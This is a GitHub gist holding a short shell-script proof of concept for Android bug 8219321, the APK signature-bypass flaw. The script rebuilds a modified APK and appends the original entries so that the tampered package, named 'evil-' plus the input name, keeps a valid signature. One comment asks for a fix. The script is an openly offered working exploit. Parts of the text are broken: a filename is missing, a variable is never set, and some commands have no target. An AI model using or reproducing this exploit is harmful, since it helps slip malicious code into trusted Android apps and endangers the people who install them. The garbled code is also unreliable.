Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
Quick & dirty PoC for Android bug 8219321 discovered by BlueboxSec
# PoC for Android bug 8219321 by @pof
# +info:
if [ -z $1 ]; then echo "Usage: $0 <file.apk>" ; exit 1 ; fi
rm -r out out.apk tmp 2>/dev/null
java -jar apktool.jar d $APK out
#apktool d $APK out
echo "Modify files, when done type 'exit'"
cd out
cd ..
java -jar apktool.jar b out out.apk
#apktool b out out.apk
mkdir tmp
cd tmp/
unzip ../$APK
mv ../out.apk .
cat > <<-EOF
import zipfile
import sys
z = zipfile.ZipFile(sys.argv[1], "a")
chmod 755
for f in `find . -type f |egrep -v "(|out.apk)"` ; do ./ out.apk "$f" ; done
cp out.apk ../evil-$APK
cd ..
rm -rf tmp out
echo "Modified APK: evil-$APK"
Copy link

I have also met this problem.Is there any solutions?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment